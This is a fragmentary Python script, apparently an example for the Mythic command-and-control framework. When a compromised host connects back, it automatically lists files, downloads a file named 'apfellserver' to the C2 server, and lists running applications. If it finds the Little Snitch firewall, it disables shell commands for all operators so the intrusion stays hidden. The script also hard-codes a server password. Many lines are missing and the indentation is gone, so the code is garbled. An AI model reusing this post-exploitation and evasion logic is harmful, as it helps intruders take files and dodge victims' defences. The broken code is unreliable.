from mythic import mythic_rest
mythic = mythic_rest.Mythic(
password="mythic_password",
server_ip="192.168.205.151",
print("[+] Logging into Mythic")
await mythic.set_or_create_apitoken()
# define a function to execute on new callback
await mythic.listen_for_new_callbacks(analyze_callback)
async def analyze_callback(mythic, callback):
# function gets an intance of mythic and the callback object
# create a new task to execute on this callback
callback=callback, command="ls", params="."
print("[+] got new callback, issuing ls")
submit = await mythic.create_task(task, return_on="completed")
print("[*] waiting for ls results...")
# wait up to 20s for the task to finish and get all the responses from it
results = await mythic.gather_task_responses(submit.response.id, timeout=20)
# results is now an array of responses
folder = json.loads(results[0].response)
print("[*] going through results looking for interesting files...")
for f in folder["files"]:
if f["name"] == "apfellserver":
callback=callback, command="download", params="apfellserver"
print("[+] found an interesting file, tasking it for download")
await mythic.create_task(task, return_on="submitted")
callback=callback, command="list_apps"
print("[+] tasking callback to list running applications")
# return_on="submitted" means don't wait for responses
list_apps_submit = await mythic.create_task(task, return_on="submitted")
print("[*] waiting for list_apps results...")
# instead, we'll manually gather tasks until the task is completed or errors out
results = await mythic.gather_task_responses(list_apps_submit.response.id)
# gather responses returns an array of responses
apps = json.loads(results[0].response)
print("[*] going through results looking for dangerous processes...")
if "Little Snitch Agent" in a["name"]:
list_apps_submit.response.comment = "Auto processed, created alert on Little Snitch Agent, updating block lists"
await mythic.set_comment_on_task(list_apps_submit.response)
print("[+] found a dangerous process! Little Snitch Agent - sending alert to operators")
await mythic.create_event_message(message=mythic_rest.EventMessage(message="LITTLE SNITCH DETECTED on {}".format(callback.host), level='warning'))
resp = await mythic.get_all_disabled_commands_profiles()
print("[+] Getting/creating disabled command profile to prevent bad-opsec commands based on dangerous processes")
snitchy_block_list_exists = False
for cur_dcp in resp.response:
if cur_dcp.name == "snitchy block list":
snitchy_block_list_exists = True
if not snitchy_block_list_exists:
dcp = mythic_rest.DisabledCommandsProfile(name="snitchy block list", payload_types=[
PayloadType(ptype="apfell", commands=["shell", "shell_elevated"]),
PayloadType(ptype="poseidon", commands=["shell"])
resp = await mythic.create_disabled_commands_profile(dcp)
current_operation = (await mythic.get_current_operation_info()).response
for member in current_operation.members:
print("[*] updating block list for {}".format(member.username))
resp = await mythic.update_disabled_commands_profile_for_operator(profile=dcp, operator=member, operation=current_operation)